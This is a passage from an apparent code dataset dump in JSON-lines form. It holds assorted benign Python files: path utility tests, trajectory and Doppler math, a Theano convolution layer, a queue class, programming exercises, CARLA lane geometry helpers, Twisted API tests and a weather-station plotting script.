self.assertIsNotNone(re.match('[a-f0-9]{32}$', md5(__file__)))\n\n def test_copytree(self):\n from clldutils.path import copytree\n\n dst = self.tmp_path('a', 'b')\n copytree(self.tmp_path(), dst)\n self.assertTrue(dst.exists())\n self.assertRaises(OSError, copytree, dst, dst)\n\n def test_copy(self):\n from clldutils.path import copy\n\n src = self.make_file('test')\n dst = self.tmp_path('other')\n copy(src, dst)\n self.assertEquals(src.stat().st_size, dst.stat().st_size)\n\n def test_move(self):\n from clldutils.path import move\n\n dst = self.tmp_path('a')\n dst.mkdir()\n src = self.make_file('test')\n move(src, dst)\n self.assertFalse(src.exists())\n self.assertTrue(dst.joinpath(src.name).exists())\n\n def test_remove(self):\n from clldutils.path import remove\n\n self.assertRaises(OSError, remove, self.tmp_path('nonexistingpath'))\n tmp = self.make_file('test')\n self.assertTrue(tmp.exists())\n remove(tmp)\n self.assertFalse(tmp.exists())\n\n def test_rmtree(self):\n from clldutils.path import rmtree\n\n self.assertRaises(OSError, rmtree, self.tmp_path('nonexistingpath'))\n rmtree(self.tmp_path('nonexistingpath'), ignore_errors=True)\n tmp = self.tmp_path('test')\n tmp.mkdir()\n self.assertTrue(tmp.exists())\n rmtree(tmp)\n self.assertFalse(tmp.exists())\n\n def test_walk(self):\n from clldutils.path import walk\n\n d = self.tmp_path('testdir')\n d.mkdir()\n self.make_file('testfile')\n res = [p.name for p in walk(self.tmp_path(), mode='files')]\n self.assertNotIn('testdir', res)\n self.assertIn('testfile', res)\n res = [p.name for p in walk(self.tmp_path(), mode='dirs')]\n self.assertIn('testdir', res)\n self.assertNotIn('testfile', res)\n\n def test_git_describe(self):\n from clldutils.path import git_describe\n\n d = self.tmp_path('testdir')\n self.assertRaises(ValueError, git_describe, d)\n d.mkdir()\n with capture_all(git_describe, d) as res:\n self.assertEqual(res[0], 'testdir')\n\n def test_TemporaryDirectory(self):\n from clldutils.path import TemporaryDirectory\n\n with TemporaryDirectory() as tmp:\n assert tmp.exists()\n assert not tmp.exists()\n","sub_path":"clldutils/tests/test_path.py","file_name":"test_path.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"403360790","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 30 11:59:47 2020\n\n@author: Seo\n\"\"\"\n\nimport time\nimport numpy as np\nimport cupy as cp\n\ndef createLinearTrajectory(pos1, pos2, stepArray, pos_start=None, randomWalk=None):\n '''\n Parameters\n ----------\n pos1 : Numpy array, 1-D.\n Anchor position 1. Starting position defaults to this.\n pos2 : Numpy array, 1-D.\n Anchor position 2.\n stepArray : Numpy array, 1-D.\n Array of steps. Each point will move by step * directionVectorNormed. Does not need to be equally spaced.\n pos_start : Scalar between [0,1], optional\n The default is None.\n The output will use this as the coefficient along the connecting vector between\n the 2 anchor points, as the position to start iterating at.\n randomWalk : Scalar, optional\n The default is None.\n Adds random noise around the trajectory using a normal distribution.\n\n Returns\n -------\n Matrix of column vectors of positions along the trajectory.\n For steps which exceed the 2nd anchor point, the direction reverses i.e.\n the trajectory is constructed as a bounce between the two anchor points.\n '''\n \n if pos_start is None:\n pos0 = pos1\n else:\n raise NotImplementedError\n \n result = np.zeros((len(pos1), len(stepArray)))\n finalStepArray = np.zeros(stepArray.shape)\n \n dirVec = pos2 - pos1\n anchorDist = np.linalg.norm(dirVec)\n dirVecNormed = dirVec / np.linalg.norm(dirVec)\n # revDirVecNormed = -dirVecNormed\n \n lengthsCovered = np.floor(stepArray / anchorDist)\n idxReverse = np.argwhere(lengthsCovered%2==1).flatten()\n \n # in these indices, calculate the remaining length\n remainderLen = np.remainder(stepArray[idxReverse], anchorDist)\n \n # these are removed from the full length to induce the backward motion from the 2nd anchor point\n finalStepArray[idxReverse] = anchorDist - remainderLen \n \n # for forward we do the same\n idxForward = np.argwhere(lengthsCovered%2==0).flatten()\n \n remainderForwardLen = np.remainder(stepArray[idxForward], anchorDist)\n \n finalStepArray[idxForward] = remainderForwardLen\n \n # now calculate the values\n displacements = dirVecNormed.reshape((-1,1)) * finalStepArray.reshape((1,-1))\n \n result = pos0.reshape((-1,1)) + displacements\n \n return result\n\ndef createCircularTrajectory(totalSamples, r_a=100000.0, desiredSpeed=100.0, r_h=300.0, sampleTime=3.90625e-6, phi=0): \n # initialize a bunch of rx points in a circle in 3d\n dtheta_per_s = desiredSpeed/r_a # rad/s\n arcangle = totalSamples * sampleTime * dtheta_per_s # rad\n r_theta = np.arange(phi,phi+arcangle,dtheta_per_s * sampleTime)[:totalSamples]\n \n r_x_x = r_a * np.cos(r_theta)\n r_x_y = r_a * np.sin(r_theta)\n r_x_z = np.zeros(len(r_theta)) + r_h\n r_x = np.vstack((r_x_x,r_x_y,r_x_z)).transpose()\n \n r_xdot_x = r_a * -np.sin(r_theta) * dtheta_per_s\n r_xdot_y = r_a * np.cos(r_theta) * dtheta_per_s\n r_xdot_z = np.zeros(len(r_theta))\n r_xdot = np.vstack((r_xdot_x,r_xdot_y,r_xdot_z)).transpose()\n \n return r_x, r_xdot, arcangle, dtheta_per_s\n\n\ndef calcFOA(r_x, r_xdot, t_x, t_xdot, freq=30e6):\n '''\n Expects individual row vectors.\n All numpy array shapes expected to match.\n \n Assumed that arrays are either all cupy arrays or all numpy arrays,\n operates agnostically using cupy/numpy.\n '''\n xp = cp.get_array_module(r_x)\n \n lightspd = 299792458.0\n \n radial = t_x - r_x # convention pointing towards transmitter\n radial_n = radial / xp.linalg.norm(radial,axis=1).reshape((-1,1)) # don't remove this reshape, nor the axis arg\n \n if radial_n.ndim == 1:\n vradial = xp.dot(radial_n, r_xdot) - xp.dot(radial_n, t_xdot) # minus or plus?\n else:\n # vradial = np.zeros(len(radial_n))\n # for i in range(len(radial_n)):\n # vradial[i] = np.dot(radial_n[i,:],r_xdot[i,:]) - np.dot(radial_n[i,:], t_xdot[i,:])\n \n # make distinct numpy calls instead of the loop\n dot_radial_r = xp.sum(radial_n * r_xdot, axis=1)\n dot_radial_t = xp.sum(radial_n * t_xdot, axis=1)\n vradial = dot_radial_r - dot_radial_t\n\n foa = vradial/lightspd * freq\n\n return foa\n\ndef createTriangularSpacedPoints(numPts: int, dist: float=1.0, startPt: np.ndarray=np.array([0,0])):\n '''\n Spawns locations in a set, beginning with startPt. Each location is spaced \n 'dist' apart from any other location, e.g.\n \n 2 1\n \n 3 O 0\n \n 4 5\n \n The alignment is in the shape of triangles. The order of generation is anticlockwise as shown.\n \n '''\n \n if numPts < 2:\n raise Exception(\"Please specify at least 2 points.\")\n \n origin = np.array([0.0,0.0])\n \n ptList = [origin]\n \n dirVecs = np.array([[1.0,0.0],\n [0.5,np.sqrt(3)/2],\n [-0.5,np.sqrt(3)/2],\n [-1.0,0.0],\n [-0.5,-np.sqrt(3)/2],\n [0.5,-np.sqrt(3)/2],\n [1.0,0.0]]) * dist # cyclical to ensure indexing later on\n \n layer1ptr = 0\n turnLayer = 0\n i = 1\n while i < numPts:\n idx = i - 1 # we go back to 0-indexing\n \n # test for layer\n layer = 1\n while idx >= (layer+1)*(layer/2)*6:\n layer += 1\n \n # print(\"i: %d, idx: %d, layer: %d\"% (i,idx,layer)) # verbose index printing\n \n if layer == 1: # then it's simple, just take the genVec and propagate\n newPt = origin + dirVecs[idx]\n ptList.append(newPt)\n i += 1\n else:\n # use the pointer at layer 1\n layerptr = origin + dirVecs[layer1ptr]\n \n if turnLayer == 0: # go straight all the way\n for d in range(layer-1):\n layerptr = layerptr + dirVecs[layer1ptr]\n ptList.append(np.copy(layerptr))\n turnLayer = layer - 1 # now set it to turn\n else:\n for d in range(turnLayer-1): # go straight for some layers\n layerptr = layerptr + dirVecs[layer1ptr]\n for d in range(layer - turnLayer):\n layerptr = layerptr + dirVecs[layer1ptr+1]\n ptList.append(np.copy(layerptr))\n turnLayer = turnLayer - 1 # decrement\n if turnLayer == 0: # if we have hit turnLayer 0, time to move the layer1ptr\n layer1ptr = (layer1ptr + 1) % 6\n \n \n i+=1\n \n # swap to array for cleanliness\n ptList = np.array(ptList)\n ptList = ptList + startPt # move the origin\n\n return ptList\n \n ","sub_path":"trajectoryRoutines.py","file_name":"trajectoryRoutines.py","file_ext":"py","file_size_in_byte":6826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"587713224","text":"import theano\r\nfrom theano import tensor as T\r\nfrom theano.tensor.nnet import conv2d\r\nimport numpy\r\n\r\n# initialize shared variable for weights with random values from \r\n# uniform dist weights whose shape is 4d. \r\n# 0. feature maps at layer m, (which is 2 conv filters)\r\n# 1. feature maps at m-1 (in this case 3 RGB channels)\r\n# 2. filter height, \r\n# 3. filter width\r\n\r\n# b.dimshuffle('x', 0, 'x', 'x') simply reshapes b into a 4d array \r\n# whose shape is ('x', 2, 'x', 'x') where 'x' is arbitrary. This\r\n# allows us to do elementwise operations with b since conv_out is 4d\r\n# Note: conv_out + b.dimshuffle(...) is the same thing as adding a \r\n# bias to each hidden unit.\r\n\r\nfrom theano.tensor.signal import pool\r\n\r\n## Rewriting the above as object-oriented\r\n\r\nclass LeNetConvPoolLayer(object):\r\n \"\"\" Convolution -> Pool output layer \r\n \r\n === Attributes ===\r\n\r\n @type W: theano.tensor.sharedvariable\r\n @type b: theano.tensor.sharedvariable\r\n @type params: list[self.W, self.b]\r\n @type input_: numpy.ndarray\r\n @type output_: numpy.ndarray\r\n \"\"\"\r\n def __init__(self, rng, input_, filter_shape, image_shape, poolsize=(2,2)):\r\n \"\"\"Create shared variables within a LeNetConvPoolLayer object\r\n\t@type rng: numpy.random.RandomState\r\n\t random number generator for weight initialization\r\n\t@type input_: theano.tensor.dtensor4\r\n\t symbolic image tensor of shape image_shape (4d)\r\n\t@type filter_shape: tuple or list of length 4\r\n\t (num of filters:layer m, num input feature maps: layer m-1, \r\n\t filter height, filter width)\r\n\t@type image_shape: tuple or list of length 4\r\n\t (batch size, num input feature maps,\r\n\t image height, image width)\r\n\t@type poolsize: tuple of length 2\r\n\t indicates the filter size to downsample\r\n\t\"\"\"\r\n\t# check if num input feature maps match\r\n assert image_shape[1] == filter_shape[1]\r\n self.input_ = input_\r\n\t\r\n\t# OPTIMALLY INITIALIZE WEIGHTS STEP: specific interval with uniform dist.\r\n\t# we know each hidden unit has this many inputs:\r\n\t# (num input feature maps*filter height*filter width)\r\n\t# We need to get bounds for tanh\r\n fan_in = numpy.prod(filter_shape[1:])\r\n\t# each unit in lower layer receives gradient from:\r\n\t# (num OUTPUT feature maps * filter height * filter width / poolsize)\r\n fan_out = (filter_shape[0] * numpy.prod(filter_shape[2:]) / numpy.prod(poolsize))\r\n\t# initialize weights with random weights (weight should be the same as the filter shape)\r\n W_bound = numpy.sqrt(6. / (fan_in + fan_out))\r\n self.W = theano.shared(numpy.asarray(rng.uniform(low=-W_bound, high=W_bound, size=filter_shape), dtype=theano.config.floatX), borrow=True)\r\n\r\n\t# CREATE BIAS 1D TENSOR - one for each output feature map (layer m)\r\n b_values = numpy.zeros((filter_shape[0],), dtype=theano.config.floatX)\r\n self.b = theano.shared(value=b_values, borrow=True)\r\n\r\n\t# CONVOLUTION STEP: input feature maps with filters\r\n conv_out = conv2d(\r\n input=input_,\r\n filters=self.W,\r\n filter_shape=filter_shape,\r\n input_shape=image_shape\r\n )\r\n\t\r\n\t# POOLING STEP: pool each feature map individually with maxpooling\r\n pool_out = theano.tensor.signal.pool.pool_2d(\r\n input=conv_out,\r\n ds=poolsize, # ds: downsample size\r\n ignore_border=True\r\n )\r\n\r\n\t# ACTIVATION STEP: We need to add bias to pool_out but since pool_out is a 4D tensor, \r\n\t# we need to reshape the bias to be 4D tensor of shape (1, num filters, 1, 1) and then\r\n\t# broadcast it such that it becomes (batchsize, num filter, height, width)\r\n self.output_ = T.tanh(pool_out + self.b.dimshuffle('x', 0, 'x', 'x'))\r\n\t\r\n\t# store parameters for analysis\r\n self.params = [self.W, self.b]\r\n self.input_ = input_\r\n\r\n\t\r\n","sub_path":"LeNetConvPoolLayer.py","file_name":"LeNetConvPoolLayer.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"4706745","text":"# Given two .txt files that have lists of numbers in them, find the numbers that are\n# overlapping. One .txt file has a list of all prime numbers under 1000, and the other\n# .txt file has a list of happy numbers up to 1000.\ndef main():\n print(overlapping_numbers_txt('primenumbers', 'happynumbers'))\n\ndef load_file(file):\n with open(file + '.txt', 'r') as open_file:\n return open_file.read().split()\n\n\ndef overlapping_numbers_txt(file_a, file_b):\n file_a = load_file(file_a)\n file_b = load_file(file_b)\n overlap_list = []\n for linha_a in file_a:\n if linha_a in file_b:\n overlap_list.append(linha_a)\n return overlap_list\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"23 File Overlap/file_overlap.py","file_name":"file_overlap.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"438494019","text":"'''\nЗадача «Отрицательная степень»\nУсловие\nДано действительное положительное число a и целоe число n.\n\nВычислите a^n. Решение оформите в виде функции power(a, n).\n\nСтандартной функцией возведения в степень пользоваться нельзя.\n'''\n\n\ndef power(a, n):\n res = 1\n n1 = abs(n)\n if n > 0:\n for i in range(1, int(n1) + 1):\n res *= a\n return res\n else:\n for i in range(1, int(n1) + 1):\n res *= 1 / a\n return res\n\n\na = float(input())\nn = float(input())\nprint(power(a, n))\n\n\n# Решение разработчиков\ndef power(a, n):\n res = 1\n for i in range(abs(n)):\n res *= a\n if n >= 0:\n return res\n else:\n return 1 / res\n\n\nprint(power(float(input()), int(input())))\n","sub_path":"001703StepPyStudy/Step001703PyStudyсh08_func_recurs_TASK02_20210224_negPow.py","file_name":"Step001703PyStudyсh08_func_recurs_TASK02_20210224_negPow.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"13197157","text":"\nclass QueueNode(object):\n def __init__(self, data):\n self.data = data\n self.next = None\n \n\n'''\nadd to LAST end, remove from FIRST end\nFIRST -> a -> b -> c -> LAST \n'''\nclass Queue(object):\n def __init__(self):\n self.first = None\n self.last = None\n\n def add(self, data):\n item = QueueNode(data)\n if (self.last != None):\n self.last.next = item\n self.last = item\n if (self.first == None):\n self.first = item\n \n def remove(self):\n if (self.first == None):\n raise Exception(\"no first element\")\n data = self.first.data\n self.first = self.first.next\n if (self.first == None):\n # update last in case we've gotten to the point where there's only 1 item left\n self.last = None\n return data \n \n def peek(self):\n if (self.first == None):\n raise Exception(\"no first element\")\n return self.first.data\n\nif (__name__ == '__main__'):\n print(\"doing some basic testing on queue implementation...\")\n q = Queue()\n q.add(1)\n q.add(2)\n q.add(3)\n item = q.remove()\n assert(item == 1)\n item = q.remove()\n assert(item == 2)\n first = q.peek()\n assert(first == 3)\n item = q.remove()\n assert(item == 3)\n print(\"tests all passed\")\n \n","sub_path":"data_structures/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"419891599","text":"from sys import argv\r\nfrom os.path import exists\r\n\r\nscript, fromFile, toFile = argv\r\n\r\nprint(f\"Copying from {fromFile} to {toFile}\")\r\n\r\ninFile = open(fromFile)\r\ninData = inFile.read()\r\n\r\nprint(\"The input file is \", len(inData), \" bytes long\")\r\n\r\nprint(\"Does the outfile exist? \", exists(toFile))\r\nprint(\"Ready, hit RETURN to continue or CTRL-C to exit.\")\r\ninput(\"< \")\r\n\r\noutFile = open(toFile, 'w')\r\noutFile.write(inData)\r\n\r\nprint(\"all done\")\r\n\r\noutFile.close()\r\ninFile.close()","sub_path":"ex17_Copy_File.py","file_name":"ex17_Copy_File.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"563071511","text":"# bounds on serving size for a package\n# (500, 450) -> (1, 1)\n# (10, 55) -> (5, 6)\n\n# 1 2 3 4 5 6\n# 9x 9 18 27 36 45 54\n# 11x 11 22 33 44 55 66\n\ndef lower(need, package):\n # Find the largest x such that 0.9 * x * need <= package <= 1.1 * x * need\n lo = 0\n hi = int(1e8)\n while lo + 1 < hi:\n mid = (lo + hi) // 2\n if 10 * package <= 11 * mid * need:\n hi = mid\n else:\n lo = mid\n\n return hi\n\ndef upper(need, package):\n # Find the largest x such that 0.9 * x * need <= package <= 1.1 * x * need\n lo = 0\n hi = int(1e8)\n while lo + 1 < hi:\n mid = (lo + hi) // 2\n if 9 * mid * need <= 10 * package:\n lo = mid\n else:\n hi = mid\n\n return lo\n\ndef get_bounds(need, package):\n l = lower(need, package)\n u = upper(need, package)\n if l <= u:\n return (l, u)\n\ndef intersect(a, b):\n if a[0] > b[1] or a[1] < b[0]:\n return None\n\n return (max(a[0], b[0]), min(a[1], b[1]))\n\ndef has_intersection(ints):\n a = ints[0]\n for i in ints:\n if a is None:\n break\n a = intersect(a, i)\n\n return a is not None\n\ndef solve():\n n, p = map(int, input().split())\n req = list(map(int, input().split()))\n have = [list(map(int, input().split())) for _ in range(n)]\n\n for i in range(n):\n new_row = []\n for j in range(p):\n t = get_bounds(req[i], have[i][j])\n if t is not None:\n new_row.append(t)\n\n have[i] = new_row\n have[i].sort()\n\n ptrs = [0 for _ in range(n)]\n ans = 0\n while all(ptrs[i] < len(have[i]) for i in range(n)):\n if has_intersection([have[i][ptrs[i]] for i in range(n)]):\n ptrs = [x + 1 for x in ptrs]\n ans += 1\n else:\n move = 0\n for i in range(n):\n if have[i][ptrs[i]][1] < have[move][ptrs[move]][1]:\n move = i\n\n ptrs[move] += 1\n\n return ans\n\ndef main():\n t = int(input())\n for tt in range(t):\n print('Case #{}: {}'.format(tt + 1, solve()))\n\nmain()\n","sub_path":"gcj/2017rd1a/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"433432021","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom collections import defaultdict\nimport pandas as pd\nimport math\n\n\ninpdir = '../output/timeout'\ntimeout = [10,30,60,180,360]\ndata = defaultdict(lambda:[np.nan]*len(timeout))\nfor path in os.listdir(inpdir):\n s = path.split('_')\n model = s[0]\n with open(os.path.join(inpdir, path), 'r') as f:\n score = float(f.readline().split(',')[-2])\n if len(s)==2:\n data[model][timeout.index(int(s[1]))] = score\n else:\n data[model] = [score]*len(timeout)\n exact_ans = score\n\ndata['timeout'] = timeout\ndf = pd.DataFrame(data)\ndf = df.set_index('timeout')\nfor alg in df:\n df[alg] = (df[alg] - exact_ans)/math.log(2)\ndf.plot(style=['-^','-o','-s', '-v'])\nplt.xticks(timeout)\nplt.yticks(range(-14,2,2))\nplt.xlabel('Timeout(seconds)')\nplt.ylabel('Log(Z)')\nplt.ylim(min(df.min())-1, max(df.max())+1)\nplt.legend()\nplt.show()\n","sub_path":"pysrc/drawtimeout.py","file_name":"drawtimeout.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"4493587","text":"import math\nimport numpy as np\n\nfrom collections import defaultdict\n\n\n\ndef xu(u, v_u, x0, hdg):\n beta = hdg + math.atan2(v_u,u)\n x = x0 + math.sqrt(u**2 + v_u**2) * math.cos(beta)\n return x\n\ndef yu(u, v_u, y0, hdg):\n beta = hdg + math.atan2(v_u,u)\n y = y0 + math.sqrt(u**2 + v_u**2) * math.sin(beta)\n return y\n\ndef linepoint(s, x, y, hdg, length):\n fxu = lambda u: xu(u, 0, x, hdg)\n fyu = lambda u: yu(u, 0, y, hdg)\n \n return fxu(length), -fyu(length) # minus sign convention in carla\n\ndef arcpoint(s, x, y, hdg, curvature, length):\n \n ulocal = lambda l: np.sin((l)*curvature)/curvature\n vlocal = lambda l: np.cos((l)*curvature)/curvature - 1/curvature\n \n fxl = lambda l: xu(ulocal(l), vlocal(l), x, hdg)\n fyl = lambda l: yu(ulocal(l), vlocal(l), y, hdg)\n\n return fxl(length), -fyl(length) # minus sign convention in carla\n \ndef parapoly(s, a, b, c, d):\n s = float(s)\n a = float(a)\n b = float(b)\n c = float(c)\n d = float(d)\n return lambda u: a + b*(u-s) + c*(u-s)**2 + d*(u-s)**3\n\nclass parapoly3:\n def __init__(self, s, e, a, b, c, d):\n self.s = float(s)\n self.e = float(e)\n self.a = float(a)\n self.b = float(b)\n self.c= float(c)\n self.d = float(d)\n\n self.poly = parapoly(s, a, b, c, d)\n\n def __call__(self, u):\n if (self.s <= u and u <= self.e):\n return self.poly(u)\n else:\n return None\n\n def __add__(self, other):\n s = self.s\n e = self.e\n a = self.a + other.a\n b = self.b + other.b\n c = self.c + other.c\n d = self.d + other.d\n return parapoly3(s, e, a, b, c, d)\n\n def mult(self, num):\n s = self.s\n e = self.e\n a = self.a * num\n b = self.b * num\n c = self.c * num\n d = self.d * num\n return parapoly3(s, e, a, b, c, d)\n\nclass parapolylinks:\n def __init__(self, precedings = [], parapolys = []):\n self.precedings = precedings.copy()\n self.parapolys = parapolys.copy()\n\n def __call__(self, u, cumulative=True):\n ans = 0\n for pre in self.precedings:\n ans += pre(u, False)\n for poly in self.parapolys:\n val = poly(u)\n if val is not None:\n if cumulative:\n return val + ans\n return val\n if cumulative:\n return ans\n return 0\n\n def swidth(self, u):\n ans = 0\n for pre in self.precedings:\n ans += pre(u, False)\n return ans\n\n def ewidth(self, u):\n return self.__call__(u)\n\n\n\n\ndef gdictpoint(gdict, length):\n x = gdict['x']\n y = gdict['y']\n hdg = gdict['hdg']\n if (gdict['type'] == 'line'):\n return linepoint(0, x, y, hdg, length)\n else:\n curvature = gdict['curvature']\n return arcpoint(0, x, y, hdg, curvature, length)\n\n\n\ndef L2(x, y, road, u):\n rx, ry = road.getpoint(u)\n return (x - rx)**2 + (y - ry)**2\n\ndef ternarySearch(x, y, road):\n l=0\n r = road.length\n \n while (r - l > 0.2):\n p = 2.0/3.0 * l + 1.0/3.0 * r\n q = 1.0/3.0 * l + 2.0/3.0 * r\n l2p = L2(x, y, road, p)\n l2q = L2(x, y, road, q)\n if l2p < l2q:\n r = q\n else:\n l = p\n return (l + r)/2.0\n\ndef prdist(x, y, road):\n u = ternarySearch(x, y, road)\n l2 = L2(x, y, road, u)\n return math.sqrt(l2)\n\ndef prdist2(x, y, road, getu=False):\n u = ternarySearch(x, y, road)\n l2 = L2(x, y, road, u)\n \n \n rx0, ry0 = road.getpoint(u - 0.1)\n if (rx0 is None):\n rx0, ry0 = road.getpoint(u)\n \n rx1, ry1 = road.getpoint(u + 0.1)\n if (rx1 is None):\n rx1, ry1 = road.getpoint(u + 0.05)\n \n p = np.array([x, y, 0]) - np.array([rx0, ry0, 0])\n du = np.array([rx1, ry1, 0]) - np.array([rx0, ry0, 0])\n duxp = np.cross(du, p)\n if getu:\n return -math.sqrt(l2)*np.sign(duxp[-1]), u\n return -math.sqrt(l2)*np.sign(duxp[-1])\n\n\n","sub_path":"carla/IMLAB_SelfDrivingCarla/local_lane_matching/geomodule.py","file_name":"geomodule.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"108943159","text":"from . import mockito\nfrom twisted.internet.defer import Deferred\nfrom twisted.python.failure import Failure\nfrom twisted.web.http_headers import Headers\nfrom launchkey_twisted.twisted_api import NoneBodyProducer, JSONResponseBodyParser\nfrom .api_test_base import TwistedAPITestBase\n\n\nclass TwistedAPIPingTest(TwistedAPITestBase):\n \"\"\"\n Tests for API ping\n\n All tests that check fional result will have to process two instancess of callback as the first call\n will return a deferred that is waiting on the it's response, a deferred, to be called by the response body\n processor\n \"\"\"\n def test_calls_request_with_get_method(self):\n self._api.ping()\n mockito.verify(self._agent).request('GET', mockito.any(), mockito.any(), mockito.any())\n\n def test_calls_request_with_proper_uri(self):\n self._api.ping()\n expected = '{0}/{1}/ping'.format(self._api_host, self._version)\n mockito.verify(self._agent).request(mockito.any(), expected, mockito.any(), mockito.any())\n\n def test_calls_request_with_correct_headers(self):\n expected = Headers({\n 'User-Agent': ['LaunchKey Twisted Client'],\n 'Accept-Type': ['application/json']\n })\n self._api.ping()\n mockito.verify(self._agent).request(mockito.any(), mockito.any(), expected, mockito.any())\n\n def test_calls_request_with_none_producer(self):\n self._api.ping()\n mockito.verify(self._agent).request(mockito.any(), mockito.any(), mockito.any(), mockito.any(NoneBodyProducer))\n\n def test_returns_expected_deferred(self):\n actual = self._api.ping()\n self.assertIs(actual, self._agent_request_deferred)\n\n def test_raises_correct_exception_for_non_json_response(self):\n self._response.headers = Headers({'content-type': ['text/html']})\n deferred = self._api.ping()\n deferred.callback(self._response)\n self.assertIsInstance(deferred.result, Failure,\n 'Unexpected Deferred result. Expected {0} but was {1}'.format(\n Failure.__name__, deferred.result.__class__.__name__))\n self.assertIsInstance(deferred.result.value, Exception,\n 'Unexpected Failure value. Expected {0} but was {1}'.format(\n Exception.__name__, deferred.result.value.__class__.__name__))\n self.assertEqual(str(deferred.result.value), 'Non JSON response from API received')\n\n def test_response_has_deferred_result_before_data_is_written(self):\n deferred = self._api.ping()\n deferred.callback(self._response)\n self.assertIsInstance(deferred.result, Deferred)\n\n def test_response_had_deliver_body_called_with_json_body_response_parser_using_request_deferred_result(\n self):\n deferred = self._api.ping()\n deferred.callback(self._response)\n mockito.verify(self._response).deliverBody(mockito.any(JSONResponseBodyParser))\n body_parser = mockito.getCallArgument(self._response, 'deliverBody')\n self.assertIs(body_parser.finished, self._agent_request_deferred.result)\n\n def test_response_callback_value_is_not_failure_when_error_not_returned_in_response(self):\n deferred = self._api.ping()\n deferred.callback(self._response)\n deferred.result.callback({'key': '', 'launchkey_time': '2015-01-01 00:00:00'})\n self.assertNotIsInstance(deferred.result, Failure)\n\n def test_response_callback_value_is_failure_when_error_is_returned_in_response(self):\n deferred = self._api.ping()\n deferred.callback(self._response)\n deferred.result.callback({'status_code': 500})\n self.assertIsInstance(deferred.result, Failure)\n\n def test_final_value_is_body_parsed_value(self):\n expected = {'key': 'expected', 'launchkey_time': '2015-01-01 00:00:00'}\n deferred = self._api.ping()\n deferred.callback(self._response)\n deferred.result.callback(expected)\n self.assertEquals(deferred.result, expected)\n\n def test_only_makes_one_agent_request_for_two_pings_with_no_force(self):\n expected = {'key': 'expected', 'launchkey_time': '2015-01-01 00:00:00'}\n deferred = self._api.ping()\n deferred.callback(self._response)\n deferred.result.callback(expected)\n\n self._api.ping()\n mockito.verify(self._agent).request(mockito.any(), mockito.any(), mockito.any(), mockito.any())\n\n def test_makes_two_agent_request_for_two_pings_with_force(self):\n expected = {'key': 'expected', 'launchkey_time': '2015-01-01 00:00:00'}\n deferred = self._api.ping(True)\n deferred.callback(self._response)\n deferred.result.callback(expected)\n\n self._api.ping(True)\n mockito.verify(self._agent, times=2).request(mockito.any(), mockito.any(), mockito.any(), mockito.any())\n\n def test_returns_deferred_with_result_having_same_value_on_second_call_for_two_pings_with_no_force(self):\n expected = {'key': 'expected', 'launchkey_time': '2015-01-01 00:00:00'}\n deferred = self._api.ping()\n deferred.callback(self._response)\n deferred.result.callback(expected)\n\n deferred = self._api.ping()\n self.assertIsInstance(deferred, Deferred)\n self.assertEquals(deferred.result, expected)\n","sub_path":"tests/tests/test_api_ping.py","file_name":"test_api_ping.py","file_ext":"py","file_size_in_byte":5334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"259013923","text":"import psycopg2\nfrom pyiem.plot import MapPlot\nimport datetime\nimport pytz\nimport numpy as np\n\npgconn2 = psycopg2.connect(database='iem', host='iemdb', user='nobody')\ncursor2 = pgconn2.cursor()\n\ncursor2.execute(\"\"\"\n SELECT id, extract(year from day) as yr,\n sum(case when max_sknt >= (40. / 1.15) or max_gust >= (40. / 1.15) then 1 else 0 end)\n from summary s JOIN stations t on (t.iemid = s.iemid)\n WHERE t.network in ('IA_ASOS', 'AWOS') and day < '2015-01-01-'\n and day > '2008-01-01'\n GROUP by id, yr\n\"\"\")\nhits = {}\nfor row in cursor2:\n stid = row[0]\n if stid not in hits:\n hits[stid] = []\n hits[stid].append(row[2])\n\nfrom pyiem.network import Table as NetworkTable\n\nnt = NetworkTable(('IA_ASOS', 'AWOS'))\n\nvals = []\nlats = []\nlons = []\nfor station in hits:\n lats.append(nt.sts[station]['lat'])\n lons.append(nt.sts[station]['lon'])\n vals.append(np.average(hits[station]))\n\nm = MapPlot(sector='iowa', axisbg='white',\n title=\"Average Number of Days per Year with Peak Wind Gust over 40 MPH\",\n subtitle=\"Based on IEM Archives of Iowa ASOS/AWOS Data (2008-2014)\")\nm.plot_values(lons, lats, vals, '%.1f')\nm.drawcounties()\nm.postprocess(filename='test.png')","sub_path":"scripts/feature/asos/map_values.py","file_name":"map_values.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"398956198","text":"class Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n # use a pointer to seperate unique numbers\n if not nums:\n return 0\n \n i, j = 0, 0\n while j < len(nums):\n if nums[j] != nums[i]:\n i+=1\n nums[i], nums[j] = nums[j], nums[i]\n j+=1\n \n return 